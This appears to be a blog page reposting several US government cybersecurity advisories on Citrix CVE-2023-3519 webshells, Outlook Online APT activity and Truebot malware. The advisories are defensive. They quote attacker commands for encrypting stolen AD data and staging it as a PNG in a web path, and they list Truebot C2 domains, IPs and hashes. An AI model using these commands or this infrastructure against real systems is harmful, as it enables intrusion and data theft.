For more information, see the joint Enduring Security Framework’s Securing the Software Supply Chain: Recommended Practices Guide for Developers, CISA’s Supply Chain Risk Management Essentials, and ACSC’s Cyber Supply Chain Risk Management.
Additionally, ACSC, CISA, and NSA recommend following cybersecurity best practices in production and enterprise environments. Software developers are high-value targets because their customers deploy software on their own trusted networks. For best practices, see:
All End-User Organizations
ACSC, CISA, and NSA recommend that all end-user organizations, including those with on-premises software, SaaS, IaaS, and private cloud models, implement the mitigations below to improve their cybersecurity posture.
For more information, see the Enduring Security Framework’s Securing the Software Supply Chain: Recommended Practices Guide for Customers, CISA’s Supply Chain Risk Management Essentials, and ACSC’s Cyber Supply Chain Risk Management.
HTTP 404
andHTTP 403
are associated with common enumeration techniques.Additionally, ACSC, CISA, and NSA recommend following cybersecurity practices. For best practices, see ACSC’s Essential Eight, CISA’s CPGs, and NSA’s Top Ten Cybersecurity Mitigation Strategies.
End-User Organizations with On-Premises Software, IaaS, or Private Cloud Models
ACSC, CISA, and NSA recommend that organizations:
ACSC, CISA, and NSA recommend that organizations with on-premises software or IaaS consider using SaaS models for their internet-facing websites.
End-User Organizations with SaaS Models
Organizations leveraging SaaS with sufficient resources may consider conducting penetration testing and using vulnerability scanners. However, such tests may interfere with service provider operations. Organizations should consult with their legal counsel as appropriate to determine what can be included in the scope of the penetration testing.
INCIDENT RESPONSE
If you or your organization are victim to a data breach or cyber incident, follow relevant cyber incident response and communications plans, as appropriate.
RESOURCES
REFERENCES
[1] A01 Broken Access Control – OWASP Top 10:2021
[2] A massive ‘stalkerware’ leak puts the phone data of thousands at risk
[3] Mobile device monitoring services do not authenticate API requests
[4] Behind the stalkerware network spilling the private phone data of hundreds of thousands
[5] First American Financial Corp. Leaked Hundreds of Millions of Title Insurance Records
[6] Biggest Data Breaches in US History [Updated 2023]
[7] AT&T Hacker ‘Weev’ Sentenced to 3.5 Years in Prison
[8] Fuzzing | OWASP Foundation
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. ACSC, CISA, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States or Australian Governments, and this guidance shall not be used for advertising or product endorsement purposes.
PURPOSE
This document was developed in furtherance of the authors’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
Source de l’article sur us-cert.gov
Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’informationSUMMARY
The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to warn network defenders about exploitation of CVE-2023-3519, an unauthenticated remote code execution (RCE) vulnerability affecting NetScaler (formerly Citrix) Application Delivery Controller (ADC) and NetScaler Gateway. In June 2023, threat actors exploited this vulnerability as a zero-day to drop a webshell on a critical infrastructure organization’s non-production environment NetScaler ADC appliance. The webshell enabled the actors to perform discovery on the victim’s active directory (AD) and collect and exfiltrate AD data. The actors attempted to move laterally to a domain controller but network-segmentation controls for the appliance blocked movement.
The victim organization identified the compromise and reported the activity to CISA and Citrix. Citrix released a patch for this vulnerability on July 18, 2023.
This advisory provides tactics, techniques, and procedures (TTPs) and detection methods shared with CISA by the victim. CISA encourages critical infrastructure organizations to use the detection guidance included in this advisory for help with determining system compromise. If potential compromise is detected, organizations should apply the incident response recommendations provided in this CSA. If no compromise is detected, organizations should immediately apply patches provided by Citrix.
Download the PDF version of this report:
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Overview
In July 2023, a critical infrastructure organization reported to CISA that threat actors may have exploited a zero-day vulnerability in NetScaler ADC to implant a webshell on their non-production NetScaler ADC appliance. Citrix confirmed that the actors exploited a zero-day vulnerability: CVE-2023-3519. Citrix released a patch on July 18, 2023.[1]
CVE-2023-3519
CVE-2023-3519 is an unauthenticated RCE vulnerability affecting the following versions of NetScaler ADC and NetScaler Gateway:[1]
The affected appliance must be configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or authentication, authorization, and auditing (AAA) virtual server for exploitation.[1]
CISA added CVE-2023-3519 to its Known Exploited Vulnerabilities Catalog on July 19, 2023.
Threat Actor Activity
As part of their initial exploit chain [T1190], the threat actors uploaded a TGZ file [T1105] containing a generic webshell [T1505.003], discovery script [TA0007], and
setuid
binary [T1548.001] on the ADC appliance and conducted SMB scanning on the subnet [T1046].The actors used the webshell for AD enumeration [T1016] and to exfiltrate AD data [TA0010]. Specifically, the actors:
/flash/nsconfig/keys/updated/*
and/nsconfig/ns.conf
[T1005]. Note: These configuration files contain an encrypted password that can be decrypted by the key stored on the ADC appliance [T1552.001].ldapsearch
. The actors queried for:objectClass=user
) (objectcategory=person
) [T1033]objectClass=computer
) [T1018]objectClass=group
) [T1069.002]objectClass=subnet
)objectClass=organizationalUnit
)objectClass=contact
)objectClass=partition
)objectClass=trustedDomain
) [T1482]tar -czvf - /var/tmp/all.txt | openssl des3 -salt -k <> -out /var/tmp/test.tar.gz
. (A “tar ball” is a compressed and zipped file used by threat actors for collection and exfiltration.)cp /var/tmp/test.tar.gz /netscaler/ns_gui/vpn/medialogininit.png
.The actors’ other discovery activities were unsuccessful due to the critical infrastructure organization’s deployment of their NetScaler ADC appliance in a segmented environment. The actors attempted to:
ping -c 1 google.com
) [T1016.001].The actors also attempted to delete their artifacts [TA0005]. The actors deleted the authorization configuration file (
/etc/auth.conf
)—likely to prevent configured users (e.g., admin) from logging in remotely (e.g., CLI) [T1531]. To regain access to the ADC appliance, the organization would normally reboot into single use mode, which may have deleted artifacts from the device; however, the victim had an SSH key readily available that allowed them into the appliance without rebooting it.The actors’ post-exploitation lateral movement attempts were also blocked by network-segmentation controls. The actors implanted a second webshell on the victim that they later removed. This was likely a PHP shell with proxying capability. The actors likely used this to attempt proxying SMB traffic to the DC [T1090.001] (the victim observed SMB connections where the actors attempted to use the previously decrypted AD credential to authenticate with the DC from the ADC via a virtual machine). Firewall and account restrictions (only certain internal accounts could authenticate to the DC) blocked this activity.
MITRE ATT&CK TACTICS AND TECHNIQUES
See Table 1–Table 9 for all referenced threat actor tactics and techniques in this advisory.
Technique Title
ID
Use
Exploit Public-Facing Application
T1190
The threat actors exploited CVE-2023-3519 to implant a webshell on the organization’s NetScaler ADC appliance.
Technique Title
ID
Use
Server Software Component: Web Shell
T1505.003
The threat actors implanted a generic webshell on the organization’s NetScaler ADC appliance.
Technique Title
ID
Use
Abuse Elevation Control Mechanism: Setuid and Setgid
T1548.001
As part of their initial exploit chain uploaded a TGZ file contain a
setuid
binary on the ADC appliance.Technique Title
ID
Use
Masquerading: Masquerade File Type
T1036.008
The threat actors exfiltrated data by uploading it as an image file to a web-accessible path.
Technique Title
ID
Use
Unsecured Credentials: Credentials In Files
T1552.001
The threat actors obtained encrypted passwords from NetScaler ADC configuration files, and the decryption key was stored on the ADC appliance.
Unsecured Credentials: Private Keys
T1552.004
The threat actors obtained decryption keys to decrypt the AD credential obtained from the NetScaler ADC configuration files.
Technique Title
ID
Use
Domain Trust Discovery
T1482
The threat actors queried the AD for trusts.
Permission Groups Discovery: Domain Groups
T1069.002
The threat actors quired the AD for groups.
Remote System Discovery
T1018
The threat actors queried the AD for computers.
The threat actors attempted to execute a subnet-wide curl command to identify what was accessible from within the network as well as potential lateral movement targets. Network-segmentation controls prevented this activity.
System Network Configuration Discovery
T1016
The actors used a webshell for AD enumeration.
System Network Configuration Discovery: Internet Connection Discovery
T1016.001
The threat actors attempted to verify outbound network connectivity with a ping command and executed host commands for a subnet-wide DNS lookup. Network-segmentation controls prevented this activity.
Network Service Discovery
T1046
The threat actors conducted SMB scanning on the organization’s subnet.
Account Discovery: Domain Account
T1087.002
The threat actors queried the AD for users.
Technique Title
ID
Use
Archive Collected Data: Archive via Utility
T1560.001
The threat actors encrypted discovery data collected via openssl in “tar ball.”
Data from Local System
T1005
The threat actors viewed NetScaler ADC configuration files
flash/nsconfig/keys/updated/*
and/nsconfig/ns.conf
.Data Staged
T1074
The threat actors uploaded data as an image file to a web-accessible path:
cp /var/tmp/test.tar.gz /netscaler/ns_gui/vpn/medialogininit.png
.Technique Title
ID
Use
Ingress Tool Transfer
T1105
The threat actors exploited CVE-2023-3519 to upload a TGZ file containing a generic webshell, discovery script, and setuid binary on the ADC appliance.
Proxy: Internal Proxy
T1090.001
The actors likely used a PHP shell with proxying capability to attempt proxying SMB traffic to the DC (the traffic was blocked by a firewall and account restrictions).
Technique Title
ID
Use
Account Access Removal
T1531
The threat actors deleted the authorization configuration file (/etc/auth.conf)—likely to prevent configured users from logging in remotely (e.g., CLI).
DETECTION METHODS
Run the following victim-created checks on the ADC shell interface to check for signs of compromise:
-newermt
parameter with the date that corresponds to your last installation:find /netscaler/ns_gui/ -type f -name *.php -newermt [YYYYMMDD] -exec ls -l {} ;
find /var/vpn/ -type f -newermt [YYYYMMDD] -exec ls -l {} ;
find /var/netscaler/logon/ -type f -newermt [YYYYMMDD] -exec ls -l {} ;
find /var/python/ -type f -newermt [YYYYMMDD] -exec ls -l {} ;
grep '.sh' /var/log/httperror.log*
grep '.php' /var/log/httperror.log*
post-ex
commands, for example:grep '/flash/nsconfig/keys' /var/log/sh.log*
setuid
binaries dropped:find /var -perm -4000 -user root -not -path "/var/nslog/*" -newermt [YYYYMMDD] -exec ls -l {} ;
4625
where the failure reason is “User not allowed to logon at this computer.”sh.log*
,bash.log*
) for traces of potential malicious activity (some example keywords forgrep
are provided below):database.php
ns_gui/vpn
/flash/nsconfig/keys/updated
LDAPTLS_REQCERT
ldapsearch
openssl + salt
httpaccess-vpn.log*
) for 200 successful access of unknown web resources.INCIDENT RESPONSE
If compromise is detected, organizations should:
MITIGATIONS
CISA recommends all organizations:
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
REFERENCES
[1] Citrix Security Bulletin CTX561482: Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-3467
Source de l’article sur us-cert.gov
Enhanced Monitoring to Detect APT Activity Targeting Outlook Online
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’informationSUMMARY
In June 2023, a Federal Civilian Executive Branch (FCEB) agency identified suspicious activity in their Microsoft 365 (M365) cloud environment. The agency reported the activity to Microsoft and the Cybersecurity and Infrastructure Security Agency (CISA), and Microsoft determined that advanced persistent threat (APT) actors accessed and exfiltrated unclassified Exchange Online Outlook data.
CISA and the Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory to provide guidance to critical infrastructure organizations on enhancing monitoring of Microsoft Exchange Online environments. Organizations can enhance their cyber posture and position themselves to detect similar malicious activity by implementing logging recommendations in this advisory. Organizations that identify suspicious, anomalous activity should contact Microsoft for proceeding with mitigation actions due to the cloud-based infrastructure affected, as well as report to CISA and the FBI.
Download the PDF version of this report:
TECHNICAL DETAILS
In Mid-June 2023, an FCEB agency observed
MailItemsAccessed
events with an unexpectedClientAppID
andAppID
in M365 Audit Logs. TheMailItemsAccessed
event is generated when licensed users access items in Exchange Online mailboxes using any connectivity protocol from any client. The FCEB agency deemed this activity suspicious because the observedAppId
did not normally access mailbox items in their environment. The agency reported the activity to Microsoft and CISA.Microsoft determined that APT actors accessed and exfiltrated unclassified Exchange Online Outlook data from a small number of accounts. The APT actors used a Microsoft account (MSA) consumer key to forge tokens to impersonate consumer and enterprise users. Microsoft remediated the issue by first blocking tokens issued with the acquired key and then replacing the key to prevent continued misuse.[1]
The affected FCEB agency identified suspicious activity by leveraging enhanced logging—specifically of
MailItemsAccessed
events—and an established baseline of normal Outlook activity (e.g., expectedAppID
). TheMailItemsAccessed
event enables detection of otherwise difficult to detect adversarial activity.CISA and FBI are not aware of other audit logs or events that would have detected this activity. Critical infrastructure organizations are strongly urged to implement the logging recommendations in this advisory to enhance their cybersecurity posture and position themselves to detect similar malicious activity.
LOGGING
CISA and the FBI strongly encourage critical infrastructure organizations to ensure audit logging is enabled. Note: Per CISA’s Microsoft Exchange Online Microsoft 365 Minimum Viable Secure Configuration Baselines, FCEB agencies shall enable audit logging. These minimum viable secure configuration baselines are part of CISA’s Secure Cloud Business Applications (SCuBA) Project, which provides guidance for FCEB agencies securing their cloud business application environments and protecting federal information created, accessed, shared, and stored in those environments. Although tailored to FCEB agencies, the project provides security guidance applicable to all organizations with cloud environments. The Office of Management and Budget (OMB) M-21-31 requires Microsoft audit logs be retained for at least twelve months in active storage and an additional eighteen months in cold storage. This can be accomplished either by offloading the logs out of the cloud environment or natively through Microsoft by creating an audit log retention policy.
In addition to enabling audit logging, CISA and FBI strongly encourage organizations to:
GENERAL CLOUD MITIGATIONS
All mitigation actions for this activity are the responsibility of Microsoft due to the cloud-based infrastructure affected; however, CISA and the FBI recommend that critical infrastructure organizations implement the following to harden their cloud environments. Although, these mitigations will not prevent this or related activity where actors leverage compromised consumer keys, they will reduce the impact of less sophisticated malicious activity targeting cloud environments. Note: These mitigations align with CISA’s SCuBA Technical Reference Architecture (TRA), which describes essential components of security services and capabilities to secure and harden cloud business applications, including the platforms hosting the applications.
REPORTING SUSPICIOUS ACTIVITY
Organizations are encouraged to report suspicious activity to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). The FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office or IC3.gov.
RESOURCES
REFERENCES
[1] Microsoft Security Response Center (MSRC) blog: Microsoft mitigates China-based threat actor Storm-0558 targeting of customer email
ACKNOWLEDGEMENTS
Microsoft contributed to this CSA.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. The FBI, and CISA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI and CISA.
Source de l’article sur us-cert.gov
Increased Truebot Activity Infects U.S. and Canada Based Networks
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’informationSUMMARY
The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Canadian Centre for Cyber Security (CCCS) are releasing this joint Cybersecurity Advisory (CSA) in response to cyber threat actors leveraging newly identified Truebot malware variants against organizations in the United States and Canada. As recently as May 31, 2023, the authoring organizations have observed an increase in cyber threat actors using new malware variants of Truebot (also known as Silence.Downloader). Truebot is a botnet that has been used by malicious cyber groups like CL0P Ransomware Gang to collect and exfiltrate information from its target victims.
Previous Truebot malware variants were primarily delivered by cyber threat actors via malicious phishing email attachments; however, newer versions allow cyber threat actors to also gain initial access through exploiting CVE-2022-31199—(a remote code execution vulnerability in the Netwrix Auditor application), enabling deployment of the malware at scale within the compromised environment. Based on confirmation from open-source reporting and analytical findings of Truebot variants, the authoring organizations assess cyber threat actors are leveraging both phishing campaigns with malicious redirect hyperlinks and CVE-2022-31199 to deliver new Truebot malware variants.
The authoring organizations recommend hunting for the malicious activity using the guidance outlined in this CSA, as well as applying vendor patches to Netwrix Auditor (version 10.5—see Mitigations section below).[1] Any organization identifying indicators of compromise (IOCs) within their environment should urgently apply the incident responses and mitigation measures detailed in this CSA and report the intrusion to CISA or the FBI.
Download the PDF version of this report:
Read the associated Malware Analysis Report MAR-10445155-1.v1 Truebot Activity Infects U.S. and Canada Based Networks or download the PDF version below:
For a downloadable copy of IOCs in .xml and .json format, see:
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section below for cyber threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.
Initial Access and Execution
In recent months, open source reporting has detailed an increase in Truebot malware infections, particularly cyber threat actors using new tactics, techniques, and procedures (TTPs), and delivery methods.[2] Based on the nature of observed Truebot operations, the primary objective of a Truebot infection is to exfiltrate sensitive data from the compromised host(s) for financial gain [TA0010].
Following the successful download of the malicous file, Truebot renames itself and then loads FlawedGrace onto the host. Please see the FlawedGrace section below for more information on how this remote access tool (RAT) is used in Truebot operations.
After deployment by Truebot, FlawedGrace is able to modify registry [T1112] and print spooler programs [T1547.012] that control the order that documents are loaded to a print queue. FlawedGrace manipulates these features to both escalate privilege and establish persistence.
During FlawedGrace’s execution phase, the RAT stores encrypted payloads [T1027.009] within the registry. The tool can create scheduled tasks and inject payloads into
msiexec.exe
andsvchost.exe
, which are command processes that enable FlawedGrace to establish a command and control (C2) connection to92.118.36[.]199
, for example, as well as load dynamic link libraries (DLLs) [T1055.001] to accomplish privilege escalation.Several hours post initial access, Truebot has been observed injecting Cobalt Strike beacons into memory [T1055] in a dormant mode for the first few hours prior to initiating additional operations. Please see the Cobalt Strike section below for more information on how this remote access tool (RAT) is used in Truebot operations.
Discovery and Defense Evasion
During the first stage of Truebot’s execution process, it checks the current version of the operating system (OS) with
RtlGetVersion
and processor architecture usingGetNativeSystemInfo
[T1082].[4] Note: This variant of Truebot malware is designed with over one gigabyte (GB) of junk code which functions to hinder detection and analysis efforts [T1027.001].Following the initial checks for system information, Truebot has the capability to enumerate all running processes [T1057], collect sensitive local host data [T1005], and send this data to an encoded data string described below for second-stage execution. Based on IOCs in table 1, Truebot also has the ability to discover software security protocols and system time metrics, which aids in defense evasion, as well as enables synchronization with the compromised system’s internal clock to facilitate scheduling tasks [T1518.001][T1124].
Next, it uses a
.JSONIP
extension, (e.g.,IgtyXEQuCEvAM.JSONIP
), to create a thirteen character globally unique identifier (GUID)—a 128-bit text string that Truebot uses to label and organize the data it collects [T1036].After creating the GUID, Truebot compiles and enumerates running process data into either a base64 or unique hexadecimal encoded string [T1027.001]. Truebot’s main goal is identifying the presence of security debugger tools. However, the presence of identified debugger tools does not change Truebot’s execution process—the data is compiled into a base64 encoded string for tracking and defense evasion purposes [T1082][T1622].
Data Collection and Exfiltration
Following Truebot’s enumeration of running processes and tools, the affected system’s computer and domain name [T1082][T1016], along with the newly generated GUID, are sent to a hard-coded URL in a
POST
request (as observed in the user-agent string). Note: A user-agent string is a customized HTTP request that includes specific device information required for interaction with web content. In this instance, cyber threat actors can redirect victims to malicious domains and further establish a C2 connection.The
POST
request functions as means for establishing a C2 connection for bi-lateral communication. With this established connection, Truebot uses a second obfuscated domain to receive additional payloads [T1105], self-replicate across the environment [T1570], and/or delete files used in its operations [T1070.004]. Truebot malware has the capability to download additional malicious modules [T1105], load shell code [T1620], and deploy various tools to stealthily navigate an infected network.Associated Delivery Vectors and Tools
Truebot has been observed in association with the following delivery vectors and tools:
Raspberry Robin (Malware)
Raspberry Robin is a wormable malware with links to other malware families and various infection methods, including installation via USB drive [T1091].[5] Raspberry Robin has evolved into one of the largest malware distribution platforms and has been observed deploying Truebot, as well as other post-compromise payloads such as IcedID and Bumblebee malware.[6] With the recent shift in Truebot delivery methods from malicious emails to the exploitation of CVE-2022-31199, a large number of Raspberry Robin infections have leveraged this exploitable CVE.[2]
Flawed Grace (Malware)
FlawedGrace is a remote access tool (RAT) that can receive incoming commands [T1059] from a C2 server sent over a custom binary protocol [T1095] using port 443 to deploy additional tools [T1105].[7] Truebot malware has been observed leveraging (and dropping) FlawedGrace via phishing campaigns as an additional payload [T1566.002].[8] Note: FlawedGrace is typically deployed minutes after Truebot malware is executed.
Cobalt Strike (Tool)
Cobalt Strike is a popular remote access tool (RAT) that cyber threat actors have leveraged—in an observable manner—for a variety of post-exploitation means. Typically a few hours after Truebot’s execution phase, cyber threat actors have been observed deploying additional payloads containing Cobalt Strike beacons for persistence and data exfiltration purposes [T1059].[2] Cyber threat actors use Cobalt Strike to move laterally via remote service session hijacking [T1563.001][T1563.002], collecting valid credentials through LSASS memory credential dumping, or creating local admin accounts to achieve pass the hash alternate authentication [T1003.001][T1550.002].
Teleport (Tool)
Cyber threat actors have been observed using a custom data exfiltration tool, which Talos has named “Teleport.”[2] Teleport is known to evade detection during data exfiltration by using an encryption key hardcoded in the binary and a custom communication protocol [T1095] that encrypts data using advanced encryption standard (AES) and a hardcoded key [T1048][T1573.002]. Furthermore, to maintain its stealth, Teleport limits the data it collects and syncs with outbound organizational data/network traffic [T1029][T1030].
Truebot Malware Indicators of Compromise (IOCs)
Truebot IOCs from May 31, 2023, contain IOCs from cyber threat actors conducting Truebot malspam campaigns. Information is derived from a trusted third party, they observed cyber threat actors from
193.3.19[.]173
(Russia) using a compromised local account to conduct phishing campaigns on May 23, 2023 and spread malware through:https[:]//snowboardspecs[.]com/nae9v
, which then promptly redirects the user to:https://www.meditimespharma[.]com/gfghthq/
, which a trusted third party has linked to other trending Truebot activity.After redirecting to
https://www.meditimespharma[.]com/gfghthq/
, trusted third parties have observed, the cyber threat actors using Truebot to pivot tohttps://corporacionhardsoft[.]com/images/2/Document_16654.exe
, which is a domain associated withsnowboardspecs[.]com
, as well as malicious phishing campaigns in May 2023 and flagged my numerous security vendors, according to trusted third party reporting. Note: these IOCs are associated with Truebot campaigns used by Graceful Spider to deliver FlawedGrace and LummaStealer payloads in May of 2023.The malicious file MD5 hash,
6164e9d297d29aa8682971259da06848
is associated with multiple Truebot rooted attack vectors and malware families, and was downloaded fromhttps://corporacionhardsoft.com/images/2/Document_16654[.]exe
which was flagged as malicious by numerous security vendors, and during its execution, the malware copies itself toC:IntelRuntimeBroker.exe
, and based on trusted third party analysis, is linked tohttps://essadonio.com/538332[.]php
, which is linked to45.182.189[.]71
(Panama) and is associated with other trending Truebot malware campaigns from May 2023.Please reference table 1 for IOCs described in the paragraph above.
Indicator Type
Indicator
Source
Registrant
GKG[.]NET Domain Proxy Service Administrator
Trusted Third Party
Compromised Account Created:
2022-04-10
Trusted Third Party
Malicious account created
1999-11-09
Trusted Third Party
IP
193.3.19[.]173 (Russia)
Trusted Third Party
URL
https://snowboardspecs[.]com/nae9v
Trusted Third Party
Domain
https://corporacionhardsoft[.]com/images/2/Document_16654.exe
Trusted Third Party
File
Document_16654[.]exe
Trusted Third Party
MD5 Hash
6164e9d297d29aa8682971259da06848
Trusted Third Party
File
Document_may_24_16654[.]exe
Trusted Third Party
File
C:IntelRuntimeBroker[.]exe
Trusted Third Party
URL
https://essadonio.com/538332[.]php
Trusted Third Party
IP
45.182.189[.]71 (Panama)
Trusted Third Party
Account Created
2023-05-18
Trusted Third Party
Indicator Type
Indicator
Source
URL
Secretsdump[.]py#l374
Domain
Secretsdump[.]py
Domain
Imsagentes[.]pe
URL
https://imsagentes[.]pe/dgrjfj/
URL
https://imsagentes[.]pe/dgrjfj
URL
https://hrcbishtek[.]com/{5
URL
https://ecorfan.org/base/sj/document_may_24_16654[.]exe
Domain
Hrcbishtek[.]com
File
F33734DFBBFF29F68BCDE052E523C287
File
F176BA63B4D68E576B5BA345BEC2C7B7
File
F14F2862EE2DF5D0F63A88B60C8EEE56
Domain
Essadonio[.]com
Domain
Ecorfan[.]org
File
C92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3
Domain
Atexec[.]py
File
A0E9F5D64349FB13191BC781F81F42E1
IPv4
92.118.36[.]199
IPv4
81.19.135[.]30
File
72A589DA586844D7F0818CE684948EEA
File
717BEEDCD2431785A0F59D194E47970E9544FBF398D462A305F6AD9A1B1100CB
IPv4
5.188.86[.]18
IPv4
5.188.206[.]78
IPv4
45.182.189[.]71
IPv4
139.60.160[.]166
File
121A1F64FFF22C4BFCEF3F11A23956ED403CDEB9BDB803F9C42763087BD6D94E
nitutdra[.]com
46.161.40[.]128
romidonionhhgtt[.]com
46.161.40.128
midnigthwaall[.]com
46.161.40[.]128
dragonetzone[.]com
46.161.40[.]128
hxxps://dragonetzone[.]com/gate_info[.]php
rprotecruuio[.]com
45.182.189[.]71
essadonio[.]com
45.182.189[.]71
hxxps://nomoresense[.]com/checkinfo[.]php
nomoresense[.]com
45.182.189[.]91
hxxps://nomoresense[.]com/checkinfo[.]php
ronoliffuion[.]com
45.182.189[.]120
hxxps://ronoliffuion[.]com/dns[.]php
bluespiredice[.]com
45.182.189[.]119
dremmfyttrred[.]com
45.182.189[.]103
hxxps://dremmfyttrred[.]com/dns[.]php
ms-online-store[.]com
45.227.253[.]102
ber6vjyb[.]com
92.118.36[.]252
hxxps://ber6vjyb[.]com/dns[.]php
jirostrogud[.]com
88.214.27[.]101
hxxps://ber6vjyb[.]com/dns[.]php
fuanshizmo[.]com
45.182.189[.]229
qweastradoc[.]com
92.118.36[.]213
hxxp://nefosferta[.]com/gate[.]php
qweastradoc[.]com
92.118.36[.]213
hxxp://nefosferta[.]com/gate[.]php
qweastradoc[.]com
92.118.36[.]213
hxxp://nefosferta[.]com/gate[.]php
hiperfdhaus[.]com
88.214.27[.]100
hxxp://nefosferta[.]com/gate[.]php
guerdofest[.]com
45.182.189[.]228
hxxp://qweastradoc[.]com/gate[.]php
nefosferta[.]com
179.60.150[.]139
hxxp://nefosferta[.]com/gate[.]php
Malicious Domain
MD5
SHA1
SHA256
nitutdra[.]com
romidonionhhgtt[.]com
midnigthwaall[.]com
dragonetzone[.]com
64b27d2a6a55768506a5658a31c045de
c69f080180430ebf15f984be14fb4c76471cd476
e0178ab0893a4f25c68ded11e74ad90403443e413413501d138e0b08a910471e
rprotecruuio[.]com
essadonio[.]com
9a3bad7d8516216695887acc9668cda1
a89c097138e5aab1f35b9a03900600057d907690
4862618fcf15ba4ad15df35a8dcb0bdb79647b455fea6c6937c7d050815494b0
essadonio[.]com
6164e9d297d29aa8682971259da06848
96b95edc1a917912a3181d5105fd5bfad1344de0
717beedcd2431785a0f59d194e47970e9544fbf398d462a305f6ad9a1b1100cb
nomoresense[.]com
8f924f3cbe5d8fe3ecb7293478901f1a
516051b4cab1be74d32a6c446eabac7fc354904f
6b646641c823414c2ee30ae8b91be3421e4f13fa98e2d99272956e61eecfc5a1
nomoresense[.]com
ac6a2f1eafaae9f6598390d1017dd76c
1c637c2ded5d3a13fd9b56c35acf4443f308be52
f9f649cb5de27f720d58aa44aec6d0419e3e89f453730e155067506ad3ece638
ronoliffuion[.]com
881485ac77859cf5aaa8e0d64fbafc5f
51be660a3bdaab6843676e9d3b2af8444e88bbda
36d89f0455c95f9b00a8cea843003d0b53c4e33431fe57b5e6ec14a6c2e00e99
bluespiredice[.]com
dremmfyttrred[.]com
e4a42cbda39a20134d6edcf9f03c44ed
afda13d5365b290f7cdea701d00d05b0c60916f8
47f962063b42de277cd8d22550ae47b1787a39aa6f537c5408a59b5b76ed0464
dremmfyttrred[.]com
aa949d1a7ebe5f878023c6cfb446e29b
06057d773ad04fda177f6b0f6698ddaa47f7168a
594ade1fb42e93e64afc96f13824b3dbd942a2cdbc877a7006c248a38425bbc1
dremmfyttrred[.]com
338476c2b0de4ee2f3e402f3495d0578
03916123864aa034f7ca3b9d45b2e39b5c91c502
a67df0a8b32bdc5f9d224db118b3153f66518737e702314873b673c914b2bb5c
ms-online-store[.]com
ber6vjyb[.]com
46fe07c07fd0f45ba45240ef9aae2a44
b918f97c7c6ebc9594de3c8f2d9d75ecc292d02b
c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125
jirostrogud[.]com
89c8afc5bbd34f160d8a2b7218b9ca4a
16ecf30ff8c7887037a17a3eaffcb17145b69160
5cc8c9f2c9cee543ebac306951e30e63eff3ee103c62dadcd2ce43ef68bc7487
jirostrogud[.]com
5da364a8efab6370a174736705645a52
792623e143ddd49c36f6868e948febb0c9e19cd3
80b9c5ec798e7bbd71bbdfffab11653f36a7a30e51de3a72c5213eafe65965d9
fuanshizmo[.]com
qweastradoc[.]com
ee1ccb6a0e38bf95e44b73c3c46268c5
62f5a16d1ef20064dd78f5d934c84d474aca8bbe
0e3a14638456f4451fe8d76fdc04e591fba942c2f16da31857ca66293a58a4c3
qweastradoc[.]com
82d4025b84cf569ec82d21918d641540
bb32c940f9ca06e7e8533b1d315545c3294ee1a0
c042ad2947caf4449295a51f9d640d722b5a6ec6957523ebf68cddb87ef3545c
qweastradoc[.]com
dbecfe9d5421d319534e0bfa5a6ac162
9e7a2464f53ce74d840eb84077472bc29fd1ba05
c9b874d54c18e895face055eeb6faa2da7965a336d70303d0bd6047bec27a29d
qweastradoc[.]com
b7fed593e8eb3646f876367b56725e6c
44090a7858eceb28bc111e1edd2f0dc98047afb2
ff8c8c8bfba5f2ba2f8003255949678df209dbff95e16f2f3c338cfa0fd1b885
hiperfdhaus[.]com
8e2b823aac6c9e11fcabecb1d8c19adf
77ad34334a370d85ca5e77436ed99f18b185eee3
a30e1f87b78d1cd529fbe2afdd679c8241d3baab175b2f083740263911a85304
hiperfdhaus[.]com
8a94163ddf956abd0ea92d89db0034e5
abc96032071adeb6217f0a5ba1aff55dc11f5438
b95a764820e918f42b664f3c9a96141e2d7d7d228da0edf151617fabdd9166cf
guerdofest[.]com
65fb9572171b903aa31a325f550d8778
d8bd44b7a8f136e29b31226f4edf566a4223266c
d5bbcaa0c3eeea17f12a5cc3dbcaffff423d00562acb694561841bcfe984a3b7
nefosferta[.]com
d9d85bdb6a3ac60a8ba6776c661dbace
78e38e522b1765efb15d0585e13c1f1301e90788
